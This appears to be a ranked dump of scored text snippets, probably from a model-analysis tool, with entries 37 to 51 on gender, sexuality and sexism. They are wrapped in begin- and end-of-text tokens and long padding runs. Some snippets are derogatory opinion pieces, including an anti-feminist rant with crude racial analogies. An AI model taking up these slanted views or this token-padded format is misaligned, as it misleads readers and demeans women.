costume. + +In the absence of a complete hormonal transition, the most radical form of gender expression possible is gender dissidence, meaning a comprehensive personal rejection of the aspects of gender that are truly social. These aspects may include fashion and hair style, personal pronouns, hobbies and interests, etc. + +But research that was recently published in Stanford University’s Magazine on Medicine reminds us that nature limits our ability to act creatively with our gender expression. In an article on the difference in the male and female brain, author Bruce Goldman highlights the innate biological differences that lead to the development of recognizable behavior patterns in males and females. + +Goldman points to research on rhesus monkeys, which revealed that to a significant degree that there are real differences in the wiring of male and female brains. In the study, male monkeys strongly preferred toys with wheels, while female monkeys gravitated towards soft, plush, toys. Goldman argues that because these monkeys weren’t molded by their parents or simian society to enjoy specific toys, their interests +================================================================================ +Rank = 37; Score = 428032.0 +<|begin_of_text|>Cementing its reputation as a slow-motion corporate car-crash, made-up technology specialist Magic Leap has been sued for sex discrimination by the woman it hired to tackle sex discrimination. + +Tannen Campbell filed in a Florida court [PDF] this week accusing the virtual-reality startup of maintaining a "hostile environment" and a "macho bullying atmosphere." She claimed she was fired after she challenged CEO Rony Abovitz on the "depths of misogyny in Magic Leap's culture." + +As VP of strategic marketing and brand identity, Campbell says part of her job was to help the tech company with what it called its "pink/blue problem" (quick hint: not calling gender inequality a "pink/blue problem" is probably a good first step). + +The pinkness was also literally an issue: the all-male tech team (who were matched by the all-male advertising and executive teams) were asked to consider how to make their augmented reality headset more female friendly and, according to Campbell, the only solution they arrived at was to produce a version in pink. + +The lawsuit then offers a wide range of accusations of sexism, stemming from tetchy to highly personal to jaw-dropping. For starters, she took issue with the fact that the Florida company's jobs page was titled "Wizards wanted," seemingly shutting out women. + +She then goes on to slam the CFO for being "the kind of man who sits a little too close to women," and the VP of IT for being loud and making "misogynistic comments." She even turns on the company's most senior woman, its chief business officer, accusing her of being "the perfect Magic Leap female employee: she went to Harvard, never disagrees with Abovitz and always does Abovitz's bidding." + +Presentation + +Before you start writing off Campbell, however, she goes into some depth on the practices and approaches she recommended Magic Leap adopt in order to bring about a more balanced workplace, and they are good. Although some are perhaps more of a wish list – such as paying for a recruiter to help the partners of female hires relocated to Florida to find jobs as well to help ease the move to the company, and paying for female tech leaders including Sheryl Sandberg and Meg Whitman to attend company meetings as speakers. + +She developed a presentation for CEO Abovitz but her scheduled meeting to go over it was cancelled no fewer than six times. It took her eight months to get the meeting, and then he terminated the meeting about halfway through. Efforts +================================================================================ +Rank = 38; Score = 423936.0 +<|begin_of_text|>"Men stick with the men and women stick with the women." + +When I first entered into recovery from a substance use disorder at age of 24, there were many things that confused me about the rhetoric of the recovery communities. Much of this confusion was easily attributed to years of accumulated mental fog still wafting away from my healing brain, however some things were just flat out puzzling to me even on the clearest of days. There were many rules to learn when it came down to what it meant to be a young person in recovery, but the heavily heterosexist concepts regarding who I should socialize with, who I ought to select as my "sponsor" and how I ought to conduct myself were the most confusing of all. Unfortunately, much of the literature produced by the mutual aid groups I was mandated to attend did nothing at all to alleviate my confusion. I, instead, found myself in the painfully familiar place of feeling like perhaps I didn't quite fit into this world. + +With the risk of developing a substance use disorder as much as 20-30 % higher for individuals who identify as LGBTQ+, it is baffling to me that heterosexism still pervades large pockets of the recovery communities. Just as those of us living with white privilege can be largely unaware of this privilege and what life is like for those without it, so too can heterosexual individuals often be unaware of the privilege they hold and what life is like for those without it. While for many folks, the idea of suggesting that "men stick with the men and women stick with the women" seems to be sound advice, this suggestion totally discounts the reality of gender identity being far more than a binary of male or female. It also ignores the fact that sexual orientation actually exists on a vast and fluid spectrum that includes so much more than just a firm heterosexual.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 421888.0 +<|begin_of_text|>Generals will attend the armed forces' LGBT conference where once service personnel had to hide their sexuality + +In the week that the armed forces' LGBT conference takes place in London, Chris Root, a former soldier, still has painful memories of being thrown out of the army for being a lesbian. + +When Root joined up in 1970, aged 17, she could not have imagined that she would be discharged just before she completed her four years in the Royal Army Armoured Corps with "services no longer required" stamped on her papers. + +"When I joined up I was away from the influences of men and the pressure to conform to heterosexuality. I soon experienced a different world," said Root. "One where lesbian relationships were accepted amongst the other female soldiers." + +The armed forces have held lesbian, gay, bisexual and transgender conferences since 2000, when the restrictions on gay men and women serving were lifted. Friday's event will provide a platform to raise issues, and for senior managers to take soundings from the LGBT community to inform policy development. + +For the first time, the conference includes not only the LGBT community, but also the military's leaders, policy makers and welfare officers. + +Before the law was overturned by the European court of human rights, it was illegal to be openly gay or lesbian in the armed forces. Today, according to the gay rights pressure group Stonewall, the RAF and Royal Navy are among the 100 most gay-friendly employers. + +Root, a radar operator, began having sexual relationships with other female soldiers soon after joining up but was quickly made aware that discovery would result in investigation by the Special Investigations Branch (SIB). + +"Everyone was terrified of the SIB," said Root, who had begun to suspect that she was being scrutinised under the "McCarthy-like regime". Unable to cope with the pressure, Root handed herself in to the SIB 100 days before her four years were up. "The dread of having my personal possessions raked through and my friends questioned became unbearable." + +Root says that other women under suspicion were dragged out of bed in the middle of the night, made to put on full dress uniform, and interrogated for days. + +"You would be asked to grass up other women and to disclose intimate details of your sex life. They would break you down until you did not know who you were. + +"I had seen it happen to other women. But I could never have imagined how bad it was for me. Those remaining days felt like 100 years." + +Today, according to Stonewall, up to +================================================================================ +Rank = 40; Score = 419840.0 +<|begin_of_text|>By now everyone knows that eighteen-year-old Kaitlyn Hunt is looking down the barrel of a lengthy jail sentence for getting all Sapphic with a girl a couple of years younger than herself. + +This situation is disgusting for at least three reasons (given time, I’m sure I could find a lot more). The first is that the state thinks it is its business to tell kids that they can’t have it off with other kids. Sure, it has the legal right to do so, but as anyone with any brains knows, legal and moral aren’t the same thing and unless one party is 14 and the other is 30 the state should keep its grubby mitts out of people’s bedrooms – the stat rape laws should be there to protect kids from adults, not from one another. + +The second reason this is disgusting is that if Kaitlyn were a boy she would at this very moment be in a jail cell serving a lengthy sentence and being the victim of not-so-statutory rape. The only reason there is such a shit storm over this case is that she is a female and, to a lesser extent, because she is gay and this latter fact has gotten the liberal media pissed off — it’s a confluence of good, old fashioned female privilege and a new fangled dislike for homophobia. Please, will someone give me an example of an 18 year old boy who has had sex with a girl only a couple of years younger and then been given the support of a massive online petition and gotten the opportunity to go on TV and complain about the case? Come on, just one. Hell, now that I think about it, one isn’t enough! Since hetero males greatly outnumber gay females you would have to come up with a lot more than one just to show equal treatment. Think about it, the great majority of 18 year olds charged with statutory rape are male, yet it is a member of the female minority that gets this big a fuss made over her – it’s analogous to the great majority of those charged with crack offenses in a mostly black city like Detroit being black, yet the furor erupting only in one of the few cases in which it’s a white guy caught with a crack pipe up his ass! Fact is, as badly as Hunt is being treated, things would be far darker were she not female and gay – she certainly wouldn’t have the Florida ACLU referring (albeit correctly) to her behavior as “both fairly innocuous and extremely common.” “Predatory, misogynist and an +================================================================================ +Rank = 41; Score = 419840.0 +<|begin_of_text|>Cathy Young has some concerns with a popular gender studies textbook: + +A few months ago, a post with a shocking claim about misogyny in America began to circulate on Tumblr, the social media site popular with older teens and young adults. It featured a scanned book page section stating that, according to “recent survey data,” when junior high school students in the Midwest were asked what they would do if they woke up “transformed into the opposite sex,” the girls showed mixed emotions but the boys’ reaction was straightforward: “‘Kill myself’ was the most common answer when they contemplated the possibility of life as a girl.” The original poster — whose comment was, “Wow” —identified the source as her “Sex & Gender college textbook,” The Gendered Society by Michael Kimmel. + +The post quickly caught on with Tumblr’s radical feminist contingent: in less than three months, it was reblogged or “liked” by over 33,000 users. Some appended their own comments, such as, “Yeah, tell me again how misogyny ‘isn’t real‘ and men and boys and actually ‘like,’ ‘love‘ and ‘respect the female sex‘? This is how deep misogynistic propaganda runs… As Germaine Greer said, ‘Women have no idea how much men hate them.'” + +Yet, as it turns out, the claim reveals less about men and misogyny than it does about gender studies and academic feminism. + +I was sufficiently intrigued to check out Kimmel’s reference: a 1984 book called The Longest War: Sex Differences in Perspective by psychologists Carol Tavris and Carole Wade. The publication date was the first tipoff that the study’s description in the excerpt was not entirely accurate: the “recent” data had to be about thirty years old. Still, did American teenage boys in the early 1980s really hold such a dismal view of being female? + +When I obtained a copy of The Longest War, I was shocked to discover that the claim was not even out of context: it seemed to have no basis at all, other than one comment among examples of negative reactions from younger boys (the survey included third- through twelfth-grade students, not just those in junior high). Published in 1983 by the Institute for Equality in Education, the study had some real fodder for feminist arguments: girls generally felt they would be better off as males while boys generally saw the switch as a disadvantage, envisioning more social restrictions and fewer career options (many responses seemed based on +================================================================================ +Rank = 42; Score = 417792.0 +<|begin_of_text|>So women "feminists" (more like female-privileged fascists ) are protesting austerity in Canada by proclaiming it sexist and chanting that the police are sexist, too: + +A demonstration “banning” men was held in downtown Montreal Tuesday night by a feminist group opposing the Couillard government’s austerity measures. Several hundred women gathered at Norman-Bethune Square near Concordia University for the protest. A strong police protest observed from both sides of the march, which began by heading north on Guy St. At times, the women chanted “Sexist police sexist, feminist resistance.” The organizers had warned on Facebook that male protesters and journalists would not be tolerated in the march. The event was trans inclusive. Many feminists prefer to gather in same-sex environments, organizers explained on the Facebook group dedicated to the event, to justify their refusal to accommodate male protesters. One person was arrested for a P6 municipal violation. The protest ended before 11 p.m. Since the protests against austerity began, several feminist groups have emerged to protest government decisions and the impact they have specifically on women. The Quebec Women’s Federation recently said that the cuts to the state affect women disproportionately, because they make up 75 per cent of personnel in public sector jobs. + +This is rich: 75% of women are in these public sector jobs, meaning that the jobs are only made up of 25% men. So women are now protesting that their disproportionate share of these jobs getting cuts is sexist, but apparently it's not sexist to have it only be 25% men making up the jobs in personnel. Also, I wonder how many of these female-dominated state jobs in Canada are being funded by male taxpayers. Maybe Canadian men should just go on strike and let the female taxpayers pick up the slack to help their "sisters." Maybe Canadian men are already going on strike as their employment rates are sinking while women's rates are increasing: + +Employment has grown more rapidly among women than men. Between 1976 and 2012, the employment rate for women rose from 41.9% to 57.9%, a 16.0 percentage point increase. On the other hand, the employment rate for men declined by 6.9 percentage points from 72.7% in 1976 to 65.8% in 2012. + +Update: I will be on CJAD in Montreal at 10 eastern this morning. + +(Artwork on PJM homepage by Shutterstock.com.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 413696.0 +<|begin_of_text|>Adultery Divorce + +Adultery Laws in India + +Adultery is a voluntary consensual relationship between a married individual and someone who is not his/her lawful spouse. Adultery is considered as legally wrong and is a punishable offense. The act of adultery is a crime which breaches the marriage vows and is detrimental to public morals. It is regarded as illegal in some countries and certain laws have been passed to keep a check over adultery. Although adultery is not a criminal offense, it may have legal consequences and the individual concerned may be penalized and punished especially if the case is pertaining to divorce. + +History: In ancient Greece and Roman world, there were harsh laws against adultery but these were applicable only if the female was married. But these laws were not relevant if a man maintained sexual relationship with a slave or an unmarried female. The Bible too forbids adultery and the seventh commandment clearly states this. In customary Judaism, both the parties were equally responsible for adultery but it applied only if the female partner was married. Lord Jesus also abhorred adultery and considered that even looking at a female lustfully is equivalent to adultery. + +According to ancient Hindu laws, only the felonious female were punished and killed while the husbands were considered equal to god and were left off with warnings only. + +Adultery laws: The legal definition of adultery varies from country to country. Laws related to adultery vary from statute to statute and at some places adultery is considered a crime and the adulterer may even have to face death penalty while at some places it is not punishable. In few statutes, if either individual is married to someone else, both parties to an adulterous liaison are culpable to the crime. Christian, Jewish, Islamic and Hindu traditions condemn the act of adultery and in Islam; the adulterers especially the female may be stoned to death. According to Indian jurisdiction, the adultery law comes under Section 497 of the Indian penal code. There are two laws pertaining to adultery:- + +Section-497- Adultery “Whoever has sexual intercourse with a person who is and whom he knows or has reason to believe to be the wife of another man, without the consent or connivance of that man, such sexual intercourse not amounting to the offence of rape, is guilty of the offence of adultery, and shall be punished with imprisonment of either description for a term which may extend to five years, or with fine, or with both. In such case, the wife shall not be punishable as an abettor.” + +Section +================================================================================ +Rank = 44; Score = 411648.0 +<|begin_of_text|>FEMALE training doctors are better off giving “blow jobs” and accepting sexual requests than reporting harassment to authorities because their careers will be destroyed. That’s the extraordinary revelation from a high-profile female Sydney vascular surgeon on sexism in the medical profession. + +Dr Gabrielle McMullin told ABC radio the worst thing victims could do was complain. + +She detailed the story of “Caroline”, whose career was ruined after she was sexually assaulted by a surgeon who took her under his wing. + +“She was horrified, she ran out of the office, she didn’t tell anyone,” Dr McMullin said. + +Later, the same surgeon began to give the Caroline bad reports. She eventually reported the case and after a long legal battle, won. + +“Despite that victory, she has never been appointed to a public position in a hospital in Australasia,” Dr McMullin told AM. + +media_camera Female doctors have been warned reporting sexual harassment may ruin their careers. Picture: Thinkstock + +“Her career was ruined by this one guy asking for sex. + +“Realistically, she would have been much better to have given him a blow job on that night. + +“What I tell my trainees is if you are approached for sex, probably the safest thing to do in terms of your career is to comply with the request. + +“The worst thing you could possibly do is to complain to the supervising body. + +“You can be sure that you will never be appointed to a major public hospital.” + +Dr Saxon Smith, president of the Australian Medical Association in NSW, told the ABC sexual harassment was not tolerated and women should speak out and not allow it to continue. + +He denied there were implications for a woman’s career if she spoke out. + +“Medicine has moved in the last 20 years. Sure, if you go back further than that — yes, it may well have been the case,” Dr Smith said. + +“But we know increasingly — and the trend is — that every graduating year for medicine is more female than male as far as the graduate numbers and as such, there is a tide to turn.” + +Originally published as ‘Blow job’ better than blowing whistle<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 45; Score = 411648.0 +<|begin_of_text|>While waiting on my son to finish his weekly drum lesson at School of Rock, I usually do one of two things: play on my phone or wander around the adjacent music store, Guitar Center. Sadly, this is what my life is reduced to as a parent: simultaneously waiting to transport him to the next destination and living vicariously through his activities, which are far more interesting than my own. + +Welcome to Adulthood. + +A few weeks back, I found myself with a dead phone battery and yet another hour to kill in Guitar Center while he practiced grooves and other timekeeping rudiments. I wandered aimlessly between the enclosed acoustic room, synthesizer and smoke-machine area, and a teetering pyramid of bongos labeled “Slashed to the Lowest Price!” Bored out of my mind, I was looking at everything and nothing at all when I made a disturbing discovery on the infamous Music-Store Corkboard. + +Continue Reading + +I couldn’t believe my eyes. Did these still exist? Indeed, they do! Incredibly, the Corkboard used to be the sole means for band auditions outside of an expensive want ad in the local paper. It was an integral communication hub for musicians — no music store, recording studio or practice space failed to have one. + +Intrigued, I knew I had stumbled upon either a music-scene artifact or an odd collective of Internet-challenged musicians. Unbelievably, there were people out there who still posted handwritten flyers and want ads for their bands. My attention arrested, I had to read every scrap of paper attached by pushpin in this 3’x5’ frame. + +But what initially seemed like a convenient and nostalgic time-waster quickly turned into something else. I found myself altogether pissed off. I was bothered by so many offerings that had an uncanny similarity: “Female Musician Wanted." Yet it wasn’t the ads themselves but the expectations that accompanied them, said or unsaid. + +These notices for female musicians all came with a strict list of orders. They weren't requests for specialized skill sets like some other ads contained — those presumably targeted toward male musicians — but orders you might give a subordinate employee or a wayward teenager. They were, well, downright insulting. The dichotomy was clear and understood: Male musicians were intrinsically talented; females were not and subsequently should be managed as such. + +The ads I read literally called for female musicians to be “drama-free,” no “druggies,” or to “have transportation!” They did +================================================================================ +Rank = 46; Score = 409600.0 +<|begin_of_text|>Gender-Neutral Pronouns + +The value of zie + +English, and most other languages, only make use of gendered pronouns for people. Someone is always "he" or "she"; the pronoun "it" is only used for inanimate objects and animals, in some cases. This leads to the problem of how to refer to the abstract single individual, in phrases such as "Once the user has performed this task, he/she/it should then..." Typically, the masculine third-person singular is used, though many people view this as sexist or simply incorrect. Some people use the feminine, but this can lead to confusion, as many think that using the feminine form specifically means only female individuals. Additionally, under normal usage, there is no way to differentiate between the general case and those times when one wants to refer only to male individuals. Many people simply use the plural ("they", "them"), but this is grammatically incorrect. A solution is to come up with a set of third-person singular gender-neutral pronouns. Over the years, several such sets have been proposed, with the following being the best variant of the most popular family. + +Subject Object Possessive + +Adjective Possessive + +Pronoun Reflexive zie zim zir zirs zimself they them their theirs themselves + +Subject Zie looked at the thing. Object The person looked at zim. Possessive Adjective It was zir thing. Possessive Pronoun The thing was zirs. Reflexive The person did it zimself. + +There are many positive aspects that recommend this set over others. All the forms are sufficiently similar to feel unified. None of them sound so similar to existing pronouns as to be indistinguishable, but they remind one of them. In fact, some forms are similar to the masculine and others to the feminine, without favoring either one overall. The analogy between the endings and those of the third-person plural make it easier to remember and understand. Additionally, the lack of repetition aids clarity and is simply an example of good design. (Some forms of actual pronouns repeat, such as the object and possessive adjective forms of "her".) Lastly, this set already has a head start over most competitors, having achieved a level of acceptance among many online communities. + +128 people have viewed this page since 25 November 2000. + +© Andrés Santiago Pérez-Bergquist, All rights reserved. The reproduction of this work, by any means electronic, physical, or otherwise, in whole or in part +================================================================================ +Rank = 47; Score = 403456.0 +<|begin_of_text|>Leaders of a Tempe mosque have decided that if congregant Sumayyah Dawud wants to continue attending prayers and other community functions at the Islamic Community Center, she must either dress and pray as a man or provide medical documentation that she is anatomically female. + +Though Dawud was born male, she has been legally female since 2011 — her Arizona driver's license and U.S. passport list her as such. She converted to Islam in 2013 and, until recently, says no one has raised any questions about her identity. + +But earlier this summer, a handful of her fellow community members went to the ICC board of directors with concerns that she was not actually female and said having her pray with them in the women’s section made them uncomfortable. + +Continue Reading + +(Dawud is not sure exactly what prompted these people to approach the board, but she suspects it has something to do with her increasingly public image as a left-wing activist and the feeling among many in the Muslim community that protesting is not "the Islamic way of doing things.") + +Sumayyah Dawud at a recent protest Miriam Wasser + +Dawud became the center of what she calls an inappropriate investigation into her personal history and has been thrust into what might just be one of the next frontiers for the Muslim community. + +Dawud first became aware of any sort of issue in July when she was called into the office of Nedal Fayad, chairman of the ICC Board of Directors, and asked point blank if she was male or female. + +“He told me that they had done a background investigation on me and found stuff that said I used to be assigned male,” Dawud says, adding that not only does she feel her privacy was violated, but this is an issue “that’s none of their business.” + +However, hoping to quell any concern and put the matter behind her, Dawud provided two forms of government identification showing she was a woman. She was told the documentation wasn’t enough and that they would need medical proof before they could permit her to continue attending the mosque. + +Despite feeling humiliated by the whole experience, Dawud gave Fayad medical documentation from her primary-care physician that stated she was female. She says he promised not to show the documents to anyone without her permission and assured her that this entire matter would remain confidential. + +“I thought the issue was resolved,” Dawud says. + +But then, a woman Dawud says she previously had considered an acquaintance told her to get out of the women’s section because she wasn’t really a woman. Dawud says she +================================================================================ +Rank = 48; Score = 401408.0 +<|begin_of_text|>The racism of evolution theory has been documented well and widely publicized. It is known less widely that many evolutionists, including Charles Darwin, also taught that women are biologically inferior to men. Darwin's ideas, including his view of women, have had a major impact on society. In a telling indication of his attitude about women (just before he married his cousin, Emma Wedgewood), Darwin listed the advantages of marrying, which included: "... constant companion, (friend in old age) who will feel interested in one, object to be beloved and played with—better than a dog anyhow—Home, and someone to take care of house..." (Darwin, 1958:232,233). + +Darwin reasoned that as a married man he would be a "poor slave,... worse than a Negro," but then reminisces that, "one cannot live the solitary life, with groggy old age, friendless... and childless staring in one's face...." Darwin concludes his discussion on the philosophical note, "there is many a happy slave" and shortly thereafter, married (1958:234). + +Darwin concluded that adult females of most species resembled the young of both sexes and from this and the other evidence, "reasoned that males are more evolutionarily advanced than females" (Kevles, 1986:8). Many anthropologists contemporary to Darwin concluded that "women's brains were analogous to those of animals," which had "overdeveloped" sense organs "to the detriment of the brain" (Fee, 1979:418). Carl Vogt, a University of Geneva natural history professor who accepted many of "the conclusions of England's great modern naturalist, Charles Darwin," argued that "the child, the female, and the senile white" all had the intellect and nature of the "grown up Negro" (1863:192). Many of Darwin's followers accepted this reasoning, including George Romanes, who concluded that evolution caused females to become, as Kevles postulated: + +... increasingly less cerebral and more emotional. Romanes... shared Darwin's view that females were less highly evolved than males—ideas which he articulated in several books and many articles that influenced a generation of biologists. Romanes apparently saw himself as the guardian of evolution, vested with a responsibility to keep it on the right path.... University of Pennsylvania... paleontologist Edward Drinker Cope wrote that male animals play a " +================================================================================ +Rank = 49; Score = 399360.0 +<|begin_of_text|>In the final scene of The FADER's Grimes cover story, Claire Boucher is hanging out at "Go" collaborator Blood Diamonds' Los Angeles studio, video-chatting with a mysterious, Taipei-based collaborator scheduled to appear on her long-awaited fourth record. The person at the other end of the line is Aristophanes 貍貓, a Taiwanese MC Boucher stumbled upon on SoundCloud and recruited to spit on an album track called "SCREAM." + +From what we know about Aristophanes 貍貓 so far, she teaches creative writing to kids by day and raps in mandarin over lurching, glitchy beats by night. Sometimes, she goes by the nickname Pan, and she's been known to pepper her sexy, sinister-sounding verses with the odd Gabriel Garcia Marquez reference or capitalist critique. Over Skype, Boucher asks Aristophanes what it's like being a female rapper on her city's local hip-hop circuit, and the artists bond over the difficulties of working in a male-dominated industry. “I think being female is sometimes so weird,” Aristophanes replies. “Sometimes at my gigs, the male MCs and producers will say, ‘That’s not rap; that’s not hip-hop.’ Maybe because they’re judging my skill. I can’t feel very comfortable hanging out with them, so I just stay in my home and spend more time on music.” + +ADVERTISEMENT + +Dip into Aristophanes 貍貓's SoundCloud, though, and you'll be glad that she's not paying the haters any mind. Her flow sounds like nothing else we've ever heard, flitting quickly and unpredictably between a high-pitched sing-song, a conspiratorial whisper, and a full-bodied groan; the beats she chooses are invariably dark, ominous, and full of bursts of industrial noise. Granted, we don't know exactly what she's rapping about, but she definitely seems to KNOW what she's saying. Below, five Aristophanes tracks that are blowing our mind.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 50; Score = 393216.0 +<|begin_of_text|>OTTAWA – Canadian veterans are at "significantly higher risk" of death by suicide than the general public, according to a first of its kind federal study that found young male veterans, and female veterans overall, are at the highest risk. + +Male veterans had a 36 per cent higher risk of death by suicide than the general population, while female veterans had an 81 per cent higher risk than the general population. + +Male veterans are 1.4 times more likely to die by suicide compared to the general male population. + +Female veterans have an 1.8 times higher risk of death by suicide compared to the general female population. + +Young male veterans are at the highest risk. Male veterans under 25 years of age have a 242 per cent higher risk of death by suicide compared to the general population of males younger than 25. + +The risk of suicide for male and female veterans has been stable over the last four decades, the study found. + +The findings are part of the "2017 Veteran Suicide Mortality Study" released by Veterans Affairs Canada on Thursday. The study looked at a span of 37 years—between 1976 and 2012 -- of Canadian mortality data from Statistics Canada, as well as the military career records of 200,734 former Canadian Armed Forces personnel. + +Over the 37 years of the study, 1,421 male veterans, and 65 female veterans died by suicide, according to the minister's office. + +Prior Veterans Affairs Canada studies have found a higher pervasiveness of mental health issues among veterans. + +It is the first ever time the federal government has collated data on veteran suicide and the government intends to use the study’s findings to inform suicide prevention for veterans. + +"The Veteran Suicide Mortality Study is an important step to understanding suicide within our Veteran population and help us create programs and services that deal with the issue effectively," said Veterans Affairs Minister Seamus O’Regan in a statement to CTV News. + +In October, the federal government announced a suicide prevention strategy which aims to improve services and supports offered to members of the military and veterans, to try to reduce the number of suicides among Canadian soldiers. + +"It’s a difficult thing to talk about, because it’s not numbers. These are real people, real families, there’s devastation in the wake of a suicide. All I can tell you is that we’re going to keep trying. We’ll keep applying effort, get people into mental health care and do everything we can using best practices and partnering with as many people and as many organizations as we have +================================================================================ +Rank = 51; Score = 391168.0 +<|begin_of_text|>‘Women hate women. That’s what I think,’ says pop star crowned Billboard’s woman of the year – and once photographed in Trump’s bed + +Madonna has described her feelings of “heartbreak” and “betrayal” in the wake of Donald Trump’s US election win, claiming: “It feels like women betrayed us.” + +During her interview with Billboard, which has crowned her Woman of the Year, the pop star compared her despair regarding the results – particularly the significant number of women who voted for Trump – to mourning. + +Why did women vote for Trump? Because misogyny is not a male-only attribute Read more + +“I feel that way every morning; I wake up and say, ‘Oh, wait, Donald Trump is still the president,’ and it wasn’t a bad dream that I had. It feels like women betrayed us. The percentage of women who voted for Trump was insanely high,” she says. + +When asked why she thought so many women – according to CNN 53% of white women voted for Trump – Madonna replied: + +Women hate women. That’s what I think it is. Women’s nature is not to support other women. It’s really sad. Men protect each other, and women protect their men and children. Women turn inward and men are more external. A lot of it has do with jealousy and some sort of tribal inability to accept that one of their kind could lead a nation. Other people just didn’t bother to vote because they didn’t like either candidate, or they didn’t think Trump had a chance in the world. They took their hands off the wheel and then the car crashed. + +Earlier this week, Madonna criticised Trump and said she was ashamed to be an American during a performance and auction that raised more than $7.5m (£5.9m) for her Malawi foundation. + +Images of the president-elect appeared behind her as she sang the lyrics to Britney Spears’s Toxic. + +The singer also revealed that she had previously been photographed in Trump’s bed – for a magazine shoot when he was not at home. She made jokes about his “cheap sheets”, saying: “They won’t be Egyptian cotton because we all know how he feels about Muslims, don’t 